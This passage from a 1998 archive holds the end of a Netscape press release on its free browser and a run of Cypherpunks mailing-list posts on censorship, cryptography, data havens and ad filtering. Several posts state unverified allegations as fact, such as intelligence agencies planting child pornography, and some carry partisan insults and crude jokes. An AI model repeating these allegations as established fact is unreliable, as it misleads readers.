Communicator-related information with others in the Internet community.
Netscape will also continue to develop new technologies and offer periodic
certified, high-quality, supported releases of its Netscape Communicator and
Navigator products, incorporating some of the best features created by this
dynamic community.

The ubiquity of Netscape's client software facilitates Netscape's strategy
of linking millions of individuals to businesses. Today's announcements will
help to further proliferate Netscape's award-winning client software which
today has an installed base of more than 68 million, providing a ready
market for businesses using Netscape's Networked Enterprise software
solutions and Netscape Netcenter services. Netscape's research indicates
that in the education market where Netscape's products are free, the
Netscape client software commands approximately 90 percent share, indicating
that users tend to choose Netscape when the choice is freely available.
Making its browser software free also will enable Netscape to continue to
drive Internet standards, maximize the number of users on the Internet, and
expand the third-party community of companies and products that take
advantage of the Netscape software platform.

Netscape has successfully shifted its business over the past year toward
enterprise software sales and to revenues from its Web site business, and
away from standalone client revenues. In the third quarter of 1997,
standalone client revenues represented approximately 18 percent of
Netscape's revenue, with the rest coming from enterprise software, services
and the Web site. Preliminary results for the fourth quarter of 1997, which
Netscape announced January 5, show standalone client revenues decreased to
approximately 13 percent in the fourth quarter. In the fourth quarter of
1996 by comparison, standalone client revenue represented approximately 45
percent of Netscape's revenue.

In conjunction with its free client, Netscape separately announced today
that it is launching a host of enhanced products and services that leverage
its free client software to make it easy for enterprise and individual
customers to adopt Netscape solutions. The new products and services
reinforce Netscape's strategy of leveraging market penetration of its
popular client software and its busy Internet site to seed further sales of
Netscape software solutions in the home and business markets. The new
products and services include enhanced subscription and support packages, an
investment protection program for Netscape Communicator users, new reduced
pricing on Netscape's retail and enterprise client products, new Premium
Services on its Netscape Netcenter online service and Netscape SuiteSpot
server software upgrades featuring Netscape client software.

In addition, the company separately announced the launch of an aggressive
new software distribution program called "Unlimited Distribution" to broadly
distribute its market-leading Internet client software for free. Unlimited
Distribution enables Original Equipment Manufacturers (OEMs), Internet
Service Providers (ISPs), telecommunications companies, Web content
providers, publishers and software developers to download and redistribute
Netscape Communicator and Netscape Navigator easily with "no strings
attached." In addition, beginning immediately, individual users can download
Netscape Communicator or Navigator for free, register for Netscape Netcenter
and, beginning tomorrow, enter the Choose Netscape Sweepstakes to win
exciting travel-related prizes including a grand prize of two all-inclusive,
seven-night tropical resort vacations.

Individuals can download a free copy of Netscape Communicator client
software or the Netscape Navigator browser from the Netscape home page at
http://home.netscape.com, or by clicking on any of the thousands of
"Netscape Now" buttons on the Internet. Netscape Communicator Professional
Edition, which adds features for enterprise customers, will be available for
US$29.

Netscape Communications Corporation is a premier provider of open software
for linking people and information over enterprise networks and the
Internet. The company offers a full line of Netscape Navigator clients,
servers, development tools and commercial applications to create a complete
platform for next-generation, live online applications. Traded on NASDAQ
under the symbol "NSCP," Netscape Communications Corporation is based in
Mountain View, California.

Additional information on Netscape Communications Corporation is available
on the Internet at http://home.netscape.com, by sending email to
info@netscape.com or by calling 650/937-2555 (corporate customers) or
650/937-3777 (individuals).

Netscape is a trademark of Netscape Communications Corporation, which is
registered in the United States and other jurisdictions. Netscape
Communications, the Netscape Communications logo, Netscape Navigator,
Netscape SuiteSpot, Netscape Composer, Netscape Messenger and Netscape
Communicator are trademarks of Netscape Communications Corporation.

----------------------------------------------------------------------------

Corporate Sales: 650/937-2555 
Corporate Renewal Sales: 650/937-2929 
Personal Sales: 650/937-3777  Government Sales: 650/937-3678 
Education Sales: 650/937-2810
If you have any questions, please visit Customer Service, or
contact your nearest sales office.
Copyright (c) 1998 Netscape Communications Corporation.
This site powered by Netscape SuiteSpot servers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Liberty <whiteliberty@nym.alias.net>
Date: Fri, 23 Jan 1998 12:12:22 +0800
To: cypherpunks@cyberpass.net
Subject: Censorship free ISP
Message-ID: <19980123035437.590.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Sorry for the cross-posting, but some of the readers may
hopefully address this:
Could you recommend me a censorship FREE InterNet Service
Provider that in addition to a "no censorship" policy also
guarantees  your privacy.
I am an ex-patriate Danish who live in the United States, but
has a friend who wants to publish material deemed hateful in my
birth country.
In Denmark, they still struggle with laws abridging freedom of
expression in regard to "hate speech."
Could you recommend any ISP to me in the United States that
satisfies this?
I know Cyberpass in California does not censor based on content.
But I am sure there are many many others.
Please respond in personal mail or to cypherpunks@cyberpass.net.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Fri, 23 Jan 1998 11:44:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: SC rules 1st doesn't cover lies [CNN] (fwd)
Message-ID: <199801230335.EAA13849@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>So you have to be an employee of the government to be a citizen?

Yes. Welcome to America, Land of the Freeh.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Fri, 23 Jan 1998 12:31:14 +0800
To: cypherpunks@ssz.com
Subject: State of the Union Address
Message-ID: <199801230425.FAA19403@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Hear that the State of the Union next Monday has a section on Internet -
>networks - critical infrastructure protection et al. Anyone have any
>details?

My bet is that it'll be the same as it always is. Klintonkov will rant about
how he wants to censor the Internet. Then he'll go on and on about how he
wants to connect every public school to the Internet and tax me to give
these kids censored feeds, all when the students are coming out of the
school system as complete morons. Some can't read, many can't do math, most
have absolutely no clue about basic science, and most have absolutely no
idea about the Bill of Rights and freedom of speech[1].

And of course he'll have to throw in a long diatribe about how Americans
need to surrender more of their freedom to the government. Maybe he'll even
mention how he doesn't remember screwing a reasonably attractive woman half
his age in the White House while she was a White House intern.

[1] Grab a totally random sample of 100 high school students. Haul the
    students out one at a time and ask them the following questions:

1) What is the acceleration of gravity at sealevel on Earth?

2) What are airlocks? What are they used for? How do they work?

3) How many chromosomes are in a normal, healthy human?

4) Joe is one of your classmates. He elects not to say the "Pledge of
   Allegience." Which of the following is true?
    a) He must say it because it is mandated by the government.
    b) He may not say it, but he must stand.
    c) He is not required to acknowledge it, except to allow others to say
       it if they wish to.
    d) He should be taken out behind the school and beaten with a
       sledgehammer. Afterwards his brains should be used to spell the words
       "Death to traitors!"
    e) He should be sent to the principal's office for disciplinary action.
    f) He should be expelled from the country.
    g) He must do so as long as he is a U.S. citizen.
    
5) Explain the equation 'f=m*a' and Newton's Third Law. 'f=m*a' is referenced
   in the context of Newtonian motion.

6) The First Amendment of the United States Constitution orders which of the
   following?
    a) Congress shall not restrict freedom of speech, the press, assembly,
       or religion.
    b) Congress shall not restrict freedom of speech, the press, assembly,
       or religion, except as ordered by the majority.
    c) Congress and private individuals may not descriminate on the basis of
       sex.
    d) Congress and private individuals may not restrict freedom of speech,
       the press, assembly, or religion.

7) What are the following government agencies and what are their function?
    a) FCC
    b) NSA
    c) CIA
    d) FBI
    e) DEA
    f) BATF
    g) NTSB
    h) DOJ
    
8) Your city passes a "teen curfew" law ordering criminal penalties for
   anybody younger than 18 who is out after 10PM on school nights. The law
   was passed by popular vote at this year's elections. Which of the
   following is true?

   a) This is a just and fair law, and is completely constitutional.
      Teenagers have no reason to be out past 10PM on school nights. They
      should be at home and asleep.
   b) This law violates the thirteenth amendment. 
   c) This law violates the first amendment. It violates freedom of assembly. 
   d) This is a constitutional law. Freedom of assembly does not apply
      because the people voted on this law and it passed by majority vote.

9) How many senators does each state have?

10) "What a piece of work is man; how noble in reason; how infinite in
    faculty, in form, in moving; how express and admirable in action..."
    Name the author.

11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
    circumstances, what is produced and in what quantities?
    
12) (sin(9)^2 + cos(9)^2)=x. If this quantity can be determined, what is x
    equal to?

13) What is the square root of 256?

14) What is the fourth root of 81?

15) Given complete control of the environment, how could one cause pure 
    water to boil at 96 degrees C?

16) Explain possible problems with cloning of humans.

Analysis:

Keep in mind that I'm talking about high school graduates or people who have
almost graduated high school here, and these are people who have taken the
appropriate courses. 

Back in high school I made the mistake of making some comments and assuming
in class discussions that people had basic knowledge. I was wrong. Okay, so
I was naive. Eventually I gave up and stopped participating simply because I
was sick and tired of doing the school's job for them.

1) Most students probably won't have any idea. The value, of course, is
about 9.81 m/s^2. 10 m/s^2 doesn't work although that's given in the
mathematics books they give these kids. Most of them probably won't even
know what the question is asking.

2) I actually brought this topic up to a group of *honors* students. Think
of the expression "shove you out an airlock" for context. They boggled,
wallowed in their ignorance and were proud, and then went off to their think
tank. After confering with each other they came back with the breathtakingly
brilliant answer that it was a contraceptive device. Of course even after
explaining to them what it was they still didn't get the reference, had no
grasp of how such a thing might work, and had no idea what it might be
useful for.

3) This is taught in elementary biology which, at least down here, is a
required course. They had no idea. Actually, most of them had no clue about
basic genetics at all. Yes, basic genetics was covered in the course, and
this material was included.

4) I was "Joe" in this case. The people involved had already taken a
semester government course. Their answer to the question would have been
along the lines of option 'd'.

5) I made a big mistake assuming they knew this one. Oops. 

6) Most seemed to believe 'b' or 'd'. Maybe they knew it was 'a' and thought
that maybe people wouldn't notice.

7) I made the mistake of using designations like this in a political science
class during a class discussion. I regretted it when I had to start
explaining these agencies and what they were supposed to be responsible for.

8) No explanation required.

9) "You expect me to memorize that for all 50 states?" "Nevermind."

10) Shakespeare. It wouldn't be so bad if they hadn't had to read Hamlet,
MacBeth, and others in their English classes. Yipes.

11) "How am I supposed to know?" "Uh, you got out of chemistry with a B."
"Yes, but they never gave me problems like that!" Uhhh...

12) Most probably couldn't solve it without a calculator.

13) Ditto.

14) Ditto.

15) They'll probably look at you like you're nuts and explain that you
can't. Uh, right.

16) In an international relations class I took students picked a side and
tried to argue it. Mine was pro-cloning or, more accurately, pro-science. 
Most were anti-cloning. Why?
    a) "God doesn't like us to do things like that." Right. Let's go outlaw
       fields of research based on one religion and what followers of one
       religion think their god is thinking at that moment. This is 
       America, not Iraq.
    b) "How would you like it if somebody just came up and cloned you
       without you knowing and then made that person tell them information
       you refused to give them yourself?" Okay, I can buy the unwillful
       cloning part of it and could support a law on the grounds that it's
       theft of genetic material or for a variety of other reasons. As 
       for the rest of that...ugh.
       
Now maybe people on this list can't answer some of these either. That isn't
the point. The point is that you should have been taught this stuff in
school. Klintonkov wants to go blow millions (billions?) of dollars for
censored network feeds in the schools and they haven't even got basic
education down? And don't say "computer literacy" either. Most high school
graduates can barely type on the bloody things, and they can forget about
actually fixing a problem themselves. The *teachers* are blatently clueless.

When Klintonkov fixes these problems he can talk about "wiring our schools
for the 21st century." Of course then he'll want to censor the feeds or the
net at large, at which point we're back to square one and should spend the
money on something useful, like paying off the multi-trillion dollar debt the 
idiots ran up.

Here's the scariest part of it all: These people are voting! And we wonder
why we're in such a mess.

The war isn't the war between the blacks and the whites, the liberals and 
the conservatives, or the Federation and the Romulans. It's between the 
clueful and the clueless.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 24 Jan 1998 00:12:03 +0800
To: Adam Shostack <ryan@michonline.com
Subject: Re: Misty???
In-Reply-To: <Pine.GSO.3.95.980122154534.24995a-100000@king>
Message-ID: <v03102804b0ee6ec1b45e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:00 AM -0800 1/23/98, Adam Shostack wrote:
>Ryan Anderson wrote:
>| > Someone on the OpenPGP list was asking for an asignment for an algorithm
>| > id in the OpenPGP RFC for Misty1 (from Japan whoda thought <g>). I made my
>| > post about snake-oil and got chastised by hal@pgp.com as he seems to think
>| > it's a respectable algorithm:
>|
>| Well, he said that he wasn't aware of any serious cryptanalysis,
>| specifically on this list.  In all honesty, that's a fully truthful
>| statement.  Tim May has conveniently confirmed that there *has* been some
>| real cryptanalysis on it, confirming that it's not a good algorithm, but
>| it's not snake-oil.  (If it get's submitted for peer review, can you
>| really call it that?)
>
>Tim has admitted that he made a mistake.  I'll offer $25 to the first
>person who sends me a URL or paper reference to something published by
>Jan 1, 1998 offering an interesting cryptanlysis of Misty, because I'm
>tired of seeing people pick on it because of Nobuki's poor English.

Yes, I was thinking of FEAL. And even FEAL was not "snake oil," in that the
inventors of it were not trying to use deception to promote it. (I consider
this to be part of what "snake oil" is.)

My comments to Nobuki-san are lighthearted jokes about his "You send me
money, I send you Misty" repeated nonsense. I doubt the guy is even
actually Japanese, for various reasons.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 23 Jan 1998 22:10:15 +0800
To: cypherpunks@toad.com
Subject: Re: (eternity) Re: Eternity Services
In-Reply-To: <v03102801b0edba2a46c3@[207.167.93.63]>
Message-ID: <i2gRJe30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
>
> You are hereby condemned to receive all the rants of Nobuki-san, Detweiler
> tentacles, and Dim Vulis artwork.

Let's have a separate mailing list.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Sat, 24 Jan 1998 04:41:44 +0800
To: cypherpunks@cyberpass.net
Subject: Sucking Sound...
Message-ID: <3.0.3.32.19980123083544.006a9088@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Has anyone else heard a "giant sucking sound" from the vicinity of the
White House lately?

-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNMjG3sJF0kXqpw3MEQKBFACfZitukIJPLnErjBCslImDtaJ7ITwAn3cJ
52LjcqMbFNWXcOxaBTWk7L8S
=jbPk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Fri, 23 Jan 1998 04:50:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <v03102800b0ec097cf8e5@[207.167.93.63]>
Message-ID: <3.0.5.32.19980123085734.0082eda0@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



bill.stewart@pobox.com wrote:

>You know better than that, Tim - The Internet is about Commerce!
>The military started it, federal funding for universities made
>it popular, Physicists working for Foreign Governments and
>grad students at US government universities made the Web,
>and Big Commerce made it grow.  It's all Federal Interest - trust them!
......................................................................

You know, I wonder why they didn't think about the Federal Interest and the
Legitimate Needs of Government when all this was going on back then.  Are
universities, students, and Physicists working for Foreign Governments any
more (or less) trustworthy than anyone else?  Was there no secrecy at all,
when all these people - especially the scientists - were communicating no
such open networks?  I guess The Authorities also, among other things,
didn't expect encryption (PGP) to grow as it did.
    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 23 Jan 1998 23:10:15 +0800
To: ryan@michonline.com
Subject: Re: Misty???
In-Reply-To: <Pine.GSO.3.95.980122154534.24995a-100000@king>
Message-ID: <199801231500.KAA17132@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Ryan Anderson wrote:
| > Someone on the OpenPGP list was asking for an asignment for an algorithm
| > id in the OpenPGP RFC for Misty1 (from Japan whoda thought <g>). I made my
| > post about snake-oil and got chastised by hal@pgp.com as he seems to think
| > it's a respectable algorithm:
| 
| Well, he said that he wasn't aware of any serious cryptanalysis,
| specifically on this list.  In all honesty, that's a fully truthful
| statement.  Tim May has conveniently confirmed that there *has* been some
| real cryptanalysis on it, confirming that it's not a good algorithm, but
| it's not snake-oil.  (If it get's submitted for peer review, can you
| really call it that?)

Tim has admitted that he made a mistake.  I'll offer $25 to the first
person who sends me a URL or paper reference to something published by
Jan 1, 1998 offering an interesting cryptanlysis of Misty, because I'm
tired of seeing people pick on it because of Nobuki's poor English.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sat, 24 Jan 1998 03:21:06 +0800
To: Pearson Shane <whgiii@invweb.net>
Subject: RE: FW: Symantec Norton, Your Eyes Only.
In-Reply-To: <01ISPZTCTU9U00AS02@hmgwy1.isd.tafensw.edu.au>
Message-ID: <3.0.5.32.19980123100807.007ec770@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 03:46 PM 1/23/98 +1100, Pearson Shane wrote:
>Hi William,
>
>Many thanks for the reply.
>
>I was hoping it was ok having Blowfish,
>but I guess it could be their own
>"efficient" version.
>
>Bye for now.
>

WHGIII gave you the most conservative answer.  That is, in cryptology, the
correct answer.

A more detailed analysis would say:

* the blowfish algorithm is considered strong for various reasons

* IFF the Norton program were written correctly
(not just the algorithm implementation, but key hiding,
worrying about getting swapped onto disk by the OS, etc.)
then it would be a useful tool for security.

* Without examining the source, any assumption of security
from using the tool relies *absolutely* on your trust of the
implementor.

(In a Turing award paper, Ritchie described how you
implicitly must trust your compiler-writers too.. the 
compiler could have clandestine functions like inserting
extra code when it recognizes patterns)

So you see how WHGIII was correct, although for practical
purposes (depending on the value of your data and the 
attackers you anticipate, plus the security of the rest of your
system (only as strong as the weakest link)) you may find this tool acceptable
in the non-exportable version.  Keylength-limited versions are worthless
from a security viewpoint.

But on this mailing list, you won't find the yes/no answer
you probably want.  Which is probably correct behavior for this list.

Cheers,


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"The tragedy of Galois is that he could have contributed so much
more to mathematics if he'd only spent more time on his marksmanship."



	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: redgod@usa.net
Date: Fri, 23 Jan 1998 11:00:28 +0800
To: Lucky Green <rdl@mit.edu>
Subject: Re: (eternity) Re: Eternity Services
Message-ID: <3.0.32.19980123104820.007ab4c0@iuol.cn.net>
MIME-Version: 1.0
Content-Type: text/plain



FUCK!
WHO REGISTER ME TO THIS MAILING LIST?
CAN YOU TELL ME HOW TO REMOVE MYSELF FROM IT?
I WILL MAD!
OH GOD! TOO MANY EMAIL!
At 08:18 AM 1/12/98 +0100, Lucky Green wrote:
>On Mon, 12 Jan 1998, Ryan Lackey wrote:
>[quoting Tim]
>> 
>> > (* I say "working" in the sense that the concept was very easy to
>> > demonstrate just by using PGP and remailers. Not much more than what I
>> > demonstrated in 1993 would be needed to deploy a real system. Except for
>> > one thing: true digital cash. Not the bullshit one-way-traceable stuff
that
>> > Chaum and others are now pushing, but the original, online-cleared or
>> > escrow-cleared form, a la the work of Goldberg et. al. For some of these
>> > applications, below, simple token- or coupon-based schemes might work
>> > adequately.)
>> 
>> There are currently-under-development systems which will meet the
digital cash 
>> requirement,
>> from people who I consider highly respectable and competent.
>
>And the demand for such ecash systems is real. I personally carried a $10
>million offer for a non-exclusive license for the blind signature patent
>to David Chaum. He declined the offer. "The patent is not for license". 
>DigiCash's CEO since March of last year, Mike Nash, also told me that
>DigiCash was not considering licensing the patent. I knew that day that it
>was time to quit. Not surprisingly, nobody heard from DigiCash since. 
>
>-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
>   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: redgod@usa.net
Date: Fri, 23 Jan 1998 11:02:05 +0800
To: Ross Anderson <cypherpunks@cyberpass.net
Subject: Re: (eternity) Service denial attacks on Eternity
Message-ID: <3.0.32.19980123104841.007a8bf0@iuol.cn.net>
MIME-Version: 1.0
Content-Type: text/plain



FUCK!
WHO REGISTER ME TO THIS MAILING LIST?
CAN YOU TELL ME HOW TO REMOVE MYSELF FROM IT?
I WILL MAD!
OH GOD! TOO MANY EMAIL!
At 04:51 PM 1/12/98 +0000, Ross Anderson wrote:
>Tim May wrote:
>
>> It is also likely in the extreme that a working Eternity service will
>> quickly be hit with attackers of various sorts who want to test the limits
>> of the service, or who want such services shut down.
>
>Exactly. When I first talked about Eternity, which was at either the
>1994 or 1995 protocols workshop, I was walking back to my seat when
>Bob Morris (then at the NSA) said, from behind his hand in a stage
>whisper, `Kiddyporn!'
>
>Adam Back added:
>
>> the spooks / feds have a history of posting their own child porn if
>> none is available to seize
>
>Indeed, and a decade or so ago there was a scandal when it turned out
>that the spooks were using the Kincora Boys' Home in Belfast as a pedo
>brothel in order to entrap various local politicians. For them to say
>now that they need key escrow to suppress Kiddyporn is a bit rich!
>
>However the main threat is the court order - Anton Pillar or whatever
>- and the best weapon against court orders is anonymity. If they don't
>know your address they can't serve you the order or arrest you for
>contempt.
>
>Tom Womack:
>
>> I can imagine *use* of the service becoming a felony
>
>I mentioned in the paper that Mossad might deny Eternity service to
>the Muslim world by posting something rude about the Prophet Mohammed.
>
>One must of course create a lawful excuse for people to have Eternity
>software mounted on their system. Maybe in addition to the `public'
>Eternity service we should have many corporate or even private
>services, many of which have escrow capabilities and are thus clearly
>law-abiding and accountable :-)
>
>There are many other possibilities. One topic that oozes into my
>consciousness from time to time is that one might integrate covert
>communications and storage with an anti-spam mail program - maybe a
>natural way forward if Adam hides Eternity traffic in spam!
>
>Tim again:
>
>> Great idea, but where are the customers?
>
>Some 90% of security research effort is on confidentiality, 9% on
>authenticity and 1% on availability. Corporate infosec expenditures
>are exactly the other way round, and tools to enable disaster recovery
>databases to be spread holographically over a company's PCs could save
>a fortune compared with the cost of some current arrangements. If a
>few of these backup resources have hidden directories that mount the
>public Eternity service, then who can tell?
>
>At the Info Hiding Workshop at Portland in April, I will present a new
>idea which may facilitate such implementations of Eternity. This is
>the Steganographic File System - designed to provide you with any file
>whose name and password you know. If you don't know this combination,
>then you can't even tell that the file is there. We do not need to
>make any assumptions about tamper resistance; it can be done using
>suitable mathematics. (This is joint work with Roger Needham and Adi
>Shamir.)
>
>Ross
>
>PS: we need a better word for `eternityspace', and Bell Labs have
>already trademarked `Inferno'. So what - Nirvana? Valhalla?
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: redgod@usa.net
Date: Fri, 23 Jan 1998 11:05:26 +0800
To: William Knowles <tcmay@got.net>
Subject: Re: (eternity) autonomous agents
Message-ID: <3.0.32.19980123104908.007a8ab0@iuol.cn.net>
MIME-Version: 1.0
Content-Type: text/plain



FUCK!
WHO REGISTER ME TO THIS MAILING LIST?
CAN YOU TELL ME HOW TO REMOVE MYSELF FROM IT?
I WILL MAD!
OH GOD! TOO MANY EMAIL!
At 03:51 PM 1/13/98 -0800, William Knowles wrote:
>On Tue, 13 Jan 1998, Tim May wrote:
>
>> At 1:23 PM -0800 1/13/98, William Knowles wrote:
>> 
>> >Anguilla seems to be a doing agood job on becoming a country
>> >willing on hosting data havens.
>> 
>> Oh yeah?
>> 
>> It's been a while since we talked about this (at least on the Cypherpunks
>> list), but a couple of years ago there was much discusson on the CP list
>> about just what items would be allowable in Anguilla. Vince Cate gave his
>> assessment, which I found fairly nebulous, in that it appeared the Ruling
>> Families would allow what they would allow, and not allow what they would
>> not allow---there seemed to be a lot of ad hoc rulings.
>
>If memory serves me right it was because Vince bounced off the Taxbomber
>site because it offered second passports, camouflage passports, and other
>products that was considered a fraud, Which to me sounds odd since there
>is some other company selling most everthing and then some from an .ai
>domain which Vince's company has the monopoly on handing out .ai domains
>
>http://www.ultramec.com.ai
> 
>> (Given that copies of "Penthouse" are illegal in Anguilla, if I recall this
>> correctly, and given that gun are illegal, and drugs are illegal, I rather
>> doubt that Anguilla would happily host "The Aryan Nations Bomb Site," or
>> "Pedophile Heaven," or "Gun Smuggler's Digest. " Or the even juicier stuff
>> any "data haven" with any claim to really being a data haven will surely
>> have.)
>
>You also have to wonder how far in the future it will be before the
>special forces of some banana republic drops in on Vince to blow-up
>his operation for as he advertises publishing censored information 
>on ones ex-president on the Internet, or for that matter I have
>yet to see abortion information coming from his servers. 
>
>What has happened in Anguilla proves that there will be a need for 
>different flavors of datahavens, Different degrees libility that
>datahaven owners will want to store information on their servers.  
>I would love to open a XXX WWW site in Anguilla pulling in the 
>industry average of $5-10K a month and not pay any taxes there, 
>But it won't happen in Anguilla with the present adminstration!
>
>> >And there are likely under a hundred oil companies looking
>> >for firms to 'recycle' their old oil platforms and drilling
>> >rigs wasting away around the world, I'm sure some might just
>> >give you one just to be rid of future liability.
>> 
>> Given the willingness of the French to have SDECE sink Greenpeace ships in
>> neutral ports, how long before a couple of kilos of Semtex are applied to
>> the underside of these oil rigs?
>>
>> Given what happened with "pirate broadcast tankers," the future is not
bright.
>
>Isn't there a microstate off the coast of England called 'Sealand' run
>from a former oil rig/gun battery for the last 20 years?  
> 
>> When the first "oil rig data haven" is found to have kiddie porn,
>> bomb-making info, and (shudder) material doubting the historicity of the
>> Holocaust, the U.N. will cluck and the public will cheer when it is boarded
>> and seized, or simply sunk.
>>
>> As I said in my last piece on this subject, there is no security in
>> meatspace comparable to what is gotten with mathematics.
>> 
>> --Tim May
>
>I agree completely, But there is still room for massively distrubted
>datahavens on oil rigs, barges, gun batteries, island nations or
>hiding in Norm's LAN in Cicero IL.  All the harder to supress that
>information.
>
>
>William Knowles
>erehwon@dis.org 
>
>==
>The information standard is more draconian than the gold
>standard, because the government has lost control of the
>marketplace.  --  Walter Wriston 
>==
>http://www.dis.org/erehwon/
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 24 Jan 1998 03:57:07 +0800
To: cypherpunks@cyberpass.net (Cypherpunks Mailing List)
Subject: Forbiden Library soon to open to the public (fwd)
Message-ID: <199801231601.LAA17521@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Sat, 24 Jan 1998 01:25:32 -0500
> To: voynich@rand.org
> From: Daniel Harms <dmharms@mailhub.acsu.buffalo.edu>
> Subject: Forbiden Library soon to open to the public
> 
>      This was on another mailing list, but I thought it might
> be of interest to the list.  Does anyone have any more details?
> 
> [Slightly edited]
> 
> >Greetings, ladies and gentlemen.
> >
> >The evening news has just announced a rather unexpected decision taken by
> >the Vatican's "Sant'Uffizio" (Holy Office): the whole archive of Holy
> >Office secret and sensitive documents, also known as the "Forbidden
> >Library", currently occupying 27 large rooms in the Vatican Library, will
> >shortly be open to the public for the purpose of academic research.
> >The works, collected between 1542 and 1903, include official records of
> >Inquisition trials and supposed miracle investigations, various tons worth
> >of confidential papers, a huge library of indexed and forbidden books, etc. 
> >According to Cardinal Ratzinger "Researchers will probably have quite a few
> >surprises".
> >
> 
> Daniel Harms     dmharms@acsu.buffalo.edu
> "Fie on the immortality of cast-iron lawn deer!"
>      -- H. P. Lovecraft
> 
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Stutz <stutz@dsl.org>
Date: Sat, 24 Jan 1998 00:24:44 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <19980122231624.60180@eskimo.com>
Message-ID: <Pine.LNX.3.95.980123110916.5762E-100000@nacs.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 22 Jan 1998, Wei Dai wrote:

> I think the long-term outlook for content providers is pretty bleak. How
> do you make a profit when your copyrights are not enforceable and your ads
> are easily filtered?

I think this is actually a very encouraging sign for content providers. The
profit model, however, will have to change -- those models that work for
free software businesses will likely also work for other forms of
information as well.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@gs160.sp.cs.cmu.edu>
Date: Sat, 24 Jan 1998 00:56:23 +0800
To: cypherpunks@toad.com
Subject: Re: FCPUNX:Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <199801231205.HAA23105@anon7.pfmc.net>
Message-ID: <199801231628.IAA08748@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home writes:
> I suggest writing a proxy server that does such filtering, running it on 
> the local machine, and using it as proxy server from your netscape browser.

"The Internet Junkbuster Proxy(TM) gets rid of stuff you don't want
 while surfing the Web, such as banner ads and cookies. It's free."

http://www.junkbusters.com/ht/en/ijb.html

-- 
     Eli Brandt  |  eli+@cs.cmu.edu  |  http://www.cs.cmu.edu/~eli/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 24 Jan 1998 02:00:07 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: sleep writing? (fwd)
Message-ID: <199801231751.LAA14854@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi David,

Forwarded message:

> >Consequently, a contradiction emerges between the universality of intellectual labor (the search for
> >universal truth and the good of all) and the particularity of the interests served. The intellectual

> middle rival?  devil rim lad?  This is too weird.

I believe the entire problem rests in that concept 'universal truth', again
a veiled reference to a theism of some sort or another, a fundamental
transcendance.

> That reminds me.  When I was in Austin, I did notice that they had quite an incredible amount of
> public access TV.

We spend quite a bit of money on it that is for shure. I believe we have
like 5 or 6 channels currently. I worked on a program for access television
a few years ago doing post production, video processing, and audio
sweetening. It was a soap opera that we filmed in a local retirement home
and even won an award at some contest in England. It was called 'Silver
Time'. The cool thing is that anyone can go down and by taking a couple of
4 hour classes put their own show on. Because I know the person who does
their technical support via contract through one of my customers (CVS)
